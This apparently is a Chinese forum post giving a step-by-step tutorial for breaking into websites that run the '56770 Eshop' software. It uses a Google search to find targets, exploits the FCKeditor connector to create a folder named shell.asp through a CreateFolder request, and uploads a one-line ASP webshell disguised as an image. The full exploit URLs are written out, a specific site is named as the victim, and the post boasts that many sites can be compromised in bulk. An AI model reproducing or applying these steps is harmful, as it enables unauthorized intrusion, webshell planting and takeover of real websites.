作者:玉鼎真人 vs 龙儿心
利用方法
Google搜索:Powered By 56770 Eshop
搜索 Powered By 56770 Eshop 获得约 43,700 条结果
随便找一个网站
就他吧www.XXXcom 一个外国网站 好你很幸运 你被我们群体XX的
哈哈
下一步 在网站地址后面添加
admin/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../connectors/asp/connector.asp
http://www.xxx.com/admin/FCKedit ... s/asp/connector.asp
从fck突破
突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
在http://www.xxx.com/admin/后面添加这段地址
(http://www.xxx.com/admin/FCKedit ... ;uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp)
点击后退一下 回到原来的添加的地址的 不过方式的一点变化
多的一个shell.asp的文件夹 刚刚的地址就事突破建立文件夹 新建的一个文件夹
shell.asp这个文件下面任何一个东西都可以解析的。
txt mp3 avi 等等。
然后点击shell
在点击浏览
上传一句话木马 我的一句话木马是图 然后点击上传
Upload 是上传 点击他
上传上去的 地址是自动命名的
ww.kennybag.com/是你要入侵的网站地址
20100606231130226608.jpg 上传时候自动命名的名称
修改这倆地址就行的
然后在连接一句话木马
这个可以批量拿。。
呵呵 这次都靠龙儿心大哥的指导